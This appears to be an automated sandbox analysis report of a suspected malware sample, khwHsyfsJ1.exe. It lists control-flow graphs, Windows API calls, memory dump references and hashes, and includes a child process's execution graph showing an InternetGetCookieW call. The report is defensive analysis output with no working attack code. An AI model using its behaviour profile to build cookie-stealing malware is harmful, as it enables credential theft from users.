                                                                                                                                                                                                                                                          control_flow_graph 400 b6634d-b66372 call b63f72 403 b66374-b6637c 400->403 404 b6637f-b663a5 MultiByteToWideChar 400->404 403->404 405 b66444-b66448 404->405 406 b663ab-b663b7 404->406 407 b66454-b66469 call b6123a 405->407 408 b6644a-b6644d 405->408 409 b66403 406->409 410 b663b9-b663ca 406->410 408->407 412 b66405-b66407 409->412 413 b663e5-b663eb 410->413 414 b663cc-b663db call b6ac20 410->414 418 b6643d-b66443 call b6646a 412->418 419 b66409-b6642b call b620b0 MultiByteToWideChar 412->419 416 b663ec call b662ff 413->416 414->418 425 b663dd-b663e3 414->425 421 b663f1-b663f6 416->421 418->405 419->418 429 b6642d-b6643b GetStringTypeW 419->429 421->418 426 b663f8 421->426 428 b663fe-b66401 425->428 426->428 428->412 429->418
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,00B654C8,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 00B6639A
                                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 00B663D2
                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00B66423
                                                                                                                                                                                                                                                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00B66435
                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 00B6643E
                                                                                                                                                                                                                                                            • Part of subcall function 00B662FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,00B67E5B,?,00000000,?,00B6686F,?,00000004,00000000,?,?,?,00B63BCD), ref: 00B66331
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1532272760.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532247071.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532296764.0000000000B6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532320850.0000000000B71000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532349116.0000000000B73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b60000_khwHsyfsJ1.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ByteCharMultiWide$AllocHeapStringType__alloca_probe_16__freea
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1857427562-0
                                                                                                                                                                                                                                                          • Opcode ID: fbb3e982c879a875ac267cfd2ba09514a649590b1e7a52b5c27a5c3527935cca
                                                                                                                                                                                                                                                          • Instruction ID: f06d8667848a2bdc5c88e360bad287abb09fbe25e59514f25198d230585ed8f5
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fbb3e982c879a875ac267cfd2ba09514a649590b1e7a52b5c27a5c3527935cca
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5B319D72A0021AABDF259F69DC95DAE7BF5EB40710B0441A9FC14D7290EB39CD51CBA0
                                                                                                                                                                                                                                                          Function 00B6561E Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 430 b6561e-b65633 GetEnvironmentStringsW 431 b65635-b65655 call b655e7 WideCharToMultiByte 430->431 432 b6568b 430->432 431->432 438 b65657 431->438 433 b6568d-b6568f 432->433 435 b65691-b65692 FreeEnvironmentStringsW 433->435 436 b65698-b656a0 433->436 435->436 439 b65658 call b662ff 438->439 440 b6565d-b65662 439->440 441 b65664-b65678 WideCharToMultiByte 440->441 442 b65680 440->442 441->442 444 b6567a-b6567e 441->444 443 b65682-b65689 call b64869 442->443 443->433 444->443
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 00B65627
                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B6564A
                                                                                                                                                                                                                                                            • Part of subcall function 00B662FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,00B67E5B,?,00000000,?,00B6686F,?,00000004,00000000,?,?,?,00B63BCD), ref: 00B66331
                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00B65670
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B65683
                                                                                                                                                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00B65692
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1532272760.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532247071.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532296764.0000000000B6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532320850.0000000000B71000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532349116.0000000000B73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b60000_khwHsyfsJ1.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2278895681-0
                                                                                                                                                                                                                                                          • Opcode ID: a715405126028da32b21225d056b358cc437572c62bc03137ee16c1de5a6acb0
                                                                                                                                                                                                                                                          • Instruction ID: 7c9a7c2573609d7628ca228bf15a92e578cabc2f2e396fa736c810029077b989
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a715405126028da32b21225d056b358cc437572c62bc03137ee16c1de5a6acb0
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8001A772602A557F27311AB69C8DCBB6EBDDFC2BA075501A9FD04D3140EFA88C11C1B0
                                                                                                                                                                                                                                                          Function 00B644A8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 447 b644a8-b644bf GetLastError 448 b644c1-b644cb call b65904 447->448 449 b644cd-b644d2 447->449 448->449 456 b6451e-b64525 SetLastError 448->456 451 b644d4 call b6480c 449->451 452 b644d9-b644df 451->452 454 b644e1 452->454 455 b644ea-b644f8 call b6595a 452->455 458 b644e2-b644e8 call b64869 454->458 463 b644fd-b64513 call b64296 call b64869 455->463 464 b644fa-b644fb 455->464 457 b64527-b6452c 456->457 465 b64515-b6451c SetLastError 458->465 463->456 463->465 464->458 465->457
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00B647FE,00B67E79,?,00B6686F,?,00000004,00000000,?,?,?,00B63BCD,?,00000000), ref: 00B644AD
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B644E2
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B64509
                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 00B64516
                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 00B6451F
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1532272760.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532247071.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532296764.0000000000B6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532320850.0000000000B71000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532349116.0000000000B73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b60000_khwHsyfsJ1.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3170660625-0
                                                                                                                                                                                                                                                          • Opcode ID: 4fb658fbe2a6972734c082a1c72372114840dc5a75618dd9031b1a77bf62d01f
                                                                                                                                                                                                                                                          • Instruction ID: 30474ad10a9cd66065bd1da8a1018a48fe3f9ab8fd3c9448bcea13ba28586c22
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4fb658fbe2a6972734c082a1c72372114840dc5a75618dd9031b1a77bf62d01f
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0101A976204E45A786226B356C96E2B16EDFBD177172041A5F51AD32D2EF6C8D414130
                                                                                                                                                                                                                                                          Function 00B66176 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 470 b66176-b66181 471 b66183-b6618b 470->471 472 b661dc-b661de 470->472 473 b66194-b6619d 471->473 474 b6618d-b66193 call b64869 471->474 476 b661a6-b661af 473->476 477 b6619f-b661a5 call b64869 473->477 474->473 480 b661b1-b661b7 call b64869 476->480 481 b661b8-b661c1 476->481 477->476 480->481 484 b661c3-b661c9 call b64869 481->484 485 b661ca-b661d3 481->485 484->485 485->472 486 b661d5-b661db call b64869 485->486 486->472
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B6618E
                                                                                                                                                                                                                                                            • Part of subcall function 00B64869: HeapFree.KERNEL32(00000000,00000000,?,00B6620D,?,00000000,?,00000000,?,00B66234,?,00000007,?,?,00B6669F,?), ref: 00B6487F
                                                                                                                                                                                                                                                            • Part of subcall function 00B64869: GetLastError.KERNEL32(?,?,00B6620D,?,00000000,?,00000000,?,00B66234,?,00000007,?,?,00B6669F,?,?), ref: 00B64891
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B661A0
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B661B2
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B661C4
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B661D6
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1532272760.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532247071.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532296764.0000000000B6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532320850.0000000000B71000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532349116.0000000000B73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b60000_khwHsyfsJ1.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                                                                                          • Opcode ID: 4585ad6eb84c8d1d63463c2633c06ff490a0b53a7628783a73c8ed619eb8437b
                                                                                                                                                                                                                                                          • Instruction ID: 7b43f601577a50ee8f491ae1ab37a19497da42051f045af4b8f1f0164841f87b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4585ad6eb84c8d1d63463c2633c06ff490a0b53a7628783a73c8ed619eb8437b
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 08F09032604600EF8660EF5DF982C1A77EDEA41B103681CA9F40EE7592CB3CFCC08A60
                                                                                                                                                                                                                                                          Function 00B63D8F Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B63DAD
                                                                                                                                                                                                                                                            • Part of subcall function 00B64869: HeapFree.KERNEL32(00000000,00000000,?,00B6620D,?,00000000,?,00000000,?,00B66234,?,00000007,?,?,00B6669F,?), ref: 00B6487F
                                                                                                                                                                                                                                                            • Part of subcall function 00B64869: GetLastError.KERNEL32(?,?,00B6620D,?,00000000,?,00000000,?,00B66234,?,00000007,?,?,00B6669F,?,?), ref: 00B64891
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B63DBF
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B63DD2
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B63DE3
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B63DF4
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1532272760.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532247071.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532296764.0000000000B6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532320850.0000000000B71000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532349116.0000000000B73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b60000_khwHsyfsJ1.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                                                                                          • Opcode ID: a9284a69b836a526e45cad495bced11478422c38b59745af8aa10ba94fd6db60
                                                                                                                                                                                                                                                          • Instruction ID: 0d43788552d44a5842b18139a340eea245bbab918c13235422879e8686295765
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a9284a69b836a526e45cad495bced11478422c38b59745af8aa10ba94fd6db60
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 32F0B7B9814660DB97656F2DFC024493BB0FB54B203454ABAF91AA76B1CF3909818EE1
                                                                                                                                                                                                                                                          Function 00B62F53 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\khwHsyfsJ1.exe,00000104), ref: 00B62F93
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B6305E
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B63068
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1532272760.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532247071.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532296764.0000000000B6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532320850.0000000000B71000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532349116.0000000000B73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b60000_khwHsyfsJ1.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _free$FileModuleName
                                                                                                                                                                                                                                                          • String ID: C:\Users\user\Desktop\khwHsyfsJ1.exe
                                                                                                                                                                                                                                                          • API String ID: 2506810119-1170798523
                                                                                                                                                                                                                                                          • Opcode ID: 14a32fd1df5710f3bf0b5bb4f9563727375d9e8f411f7040058e173c849922ad
                                                                                                                                                                                                                                                          • Instruction ID: dc4c011937a3a0a0c6e3caf98483b209be500db1a5126523328b0648788e8b80
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 14a32fd1df5710f3bf0b5bb4f9563727375d9e8f411f7040058e173c849922ad
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1F314171A00658EFDB21DB99DC819AEBBFCEF85B10F1040A6F80497211DB798E44CB61
                                                                                                                                                                                                                                                          Function 00B625E3 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00B62594,00000000,?,00B71B50,?,?,?,00B62737,00000004,InitializeCriticalSectionEx,00B6BC48,InitializeCriticalSectionEx), ref: 00B625F0
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00B62594,00000000,?,00B71B50,?,?,?,00B62737,00000004,InitializeCriticalSectionEx,00B6BC48,InitializeCriticalSectionEx,00000000,?,00B624C7), ref: 00B625FA
                                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00B62622
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1532272760.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532247071.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532296764.0000000000B6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532320850.0000000000B71000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532349116.0000000000B73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b60000_khwHsyfsJ1.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                          • String ID: api-ms-
                                                                                                                                                                                                                                                          • API String ID: 3177248105-2084034818
                                                                                                                                                                                                                                                          • Opcode ID: 60b09f9f54b56913092c86aaed13a6ca7531ccf9826d17f0477c82a774351fda
                                                                                                                                                                                                                                                          • Instruction ID: 1e4518747c22b1bb355b36f353e418c40733aa9b82702c76645695994d955f8e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 60b09f9f54b56913092c86aaed13a6ca7531ccf9826d17f0477c82a774351fda
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C9E04F30680704BBEF211B60EC06F5A3FA8FB10B91F144460F90DE80E1EBF9E9949B45
                                                                                                                                                                                                                                                          Function 00B657DD Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,00B65784,00000000,00000000,00000000,00000000,?,00B65981,00000006,FlsSetValue), ref: 00B6580F
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00B65784,00000000,00000000,00000000,00000000,?,00B65981,00000006,FlsSetValue,00B6C4D8,FlsSetValue,00000000,00000364,?,00B644F6), ref: 00B6581B
                                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00B65784,00000000,00000000,00000000,00000000,?,00B65981,00000006,FlsSetValue,00B6C4D8,FlsSetValue,00000000), ref: 00B65829
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1532272760.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532247071.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532296764.0000000000B6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532320850.0000000000B71000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532349116.0000000000B73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b60000_khwHsyfsJ1.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3177248105-0
                                                                                                                                                                                                                                                          • Opcode ID: da6ab488c0769ea30f28147761a4605d826ce420d25be83c6ee81dbe990808af
                                                                                                                                                                                                                                                          • Instruction ID: 2cd6a99cc958730e74d1c21bb93cf02fd727492d6fea4412735c2879316334b9
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: da6ab488c0769ea30f28147761a4605d826ce420d25be83c6ee81dbe990808af
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C018432615726ABC7314A68AC44E577BE8EF057A1F200564F91AD7581DF68DC50C6E0
                                                                                                                                                                                                                                                          Function 00B648BB Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B64A27
                                                                                                                                                                                                                                                            • Part of subcall function 00B6474D: IsProcessorFeaturePresent.KERNEL32(00000017,00B6473C,00000000,?,00000004,00000000,?,?,?,?,00B64749,00000000,00000000,00000000,00000000,00000000), ref: 00B6474F
                                                                                                                                                                                                                                                            • Part of subcall function 00B6474D: GetCurrentProcess.KERNEL32(C0000417), ref: 00B64771
                                                                                                                                                                                                                                                            • Part of subcall function 00B6474D: TerminateProcess.KERNEL32(00000000), ref: 00B64778
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1532272760.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532247071.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532296764.0000000000B6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532320850.0000000000B71000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532349116.0000000000B73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b60000_khwHsyfsJ1.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                                                                                                                                                                                          • String ID: *?$.
                                                                                                                                                                                                                                                          • API String ID: 2667617558-3972193922
                                                                                                                                                                                                                                                          • Opcode ID: b5ebe54ac363d96a5ffd237f2e5e25fa63b2e5d383b99c3f0f4b770ea8c32303
                                                                                                                                                                                                                                                          • Instruction ID: 2d0fe13b1067b95bbd90e9e7126ad442388290f6a34f68411b45e491eba2f998
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b5ebe54ac363d96a5ffd237f2e5e25fa63b2e5d383b99c3f0f4b770ea8c32303
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FA519F75E40619EFDF14CFA8C881AAEBBF5EF58314F2481AAE454E7341E7399E018B50

                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                          Execution Coverage:16.3%
                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                                                                                          Total number of Nodes:15
                                                                                                                                                                                                                                                          Total number of Limit Nodes:1
                                                                                                                                                                                                                                                          execution_graph 42592 7ff887f49a0a 42593 7ff887f49a0f CreateFileW 42592->42593 42595 7ff887f49b2c 42593->42595 42596 7ff887f7ac12 42597 7ff887f7ac15 42596->42597 42599 7ff887f7af42 42597->42599 42601 7ff887f41608 42597->42601 42600 7ff887f7b102 42603 7ff887f41611 42601->42603 42602 7ff887f41683 42602->42600 42603->42602 42604 7ff887f41802 LoadLibraryExW 42603->42604 42605 7ff887f41836 42604->42605 42605->42600 42606 7ff887f51212 42607 7ff887f51240 InternetGetCookieW 42606->42607 42609 7ff887f51409 42607->42609

                                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                                          Function 00007FF887F41618 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 264COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2497062115.00007FF887F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887F40000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff887f40000_dfsvc.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: N
                                                                                                                                                                                                                                                          • API String ID: 0-1130791706
                                                                                                                                                                                                                                                          • Opcode ID: d7d9e655cb69d9119e6986f32b453772976067ebe9ba7ef5c1b4dc6e6e3b2c3e
                                                                                                                                                                                                                                                          • Instruction ID: 3db4787a9ed248810aad6f846a19fdbc0a4cc25f31457cb1c12644ea134eaa18
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d7d9e655cb69d9119e6986f32b453772976067ebe9ba7ef5c1b4dc6e6e3b2c3e
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D571E771E8CA8E5FE749DB6C84196BD7BE1FF56350F0841BAD00DD7292DE28A805C741
                                                                                                                                                                                                                                                          Function 00007FF887F51075 Relevance: 1.8, APIs: 1, Instructions: 272COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2497062115.00007FF887F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887F40000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff887f40000_dfsvc.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 438582df6b3e37a9a05c9f6fbc7d4c52d40d7b42dd7e2338baa534fd898dea6c
                                                                                                                                                                                                                                                          • Instruction ID: 578f6cb86d9e3fb8207a60fd9f64c1864a070743494fa129cbed7b928ddc8db7
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 438582df6b3e37a9a05c9f6fbc7d4c52d40d7b42dd7e2338baa534fd898dea6c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7391AB30508A8D8FEB68DF29C8557F937A1FB59351F04426EE80EC7292DB74A945CB82
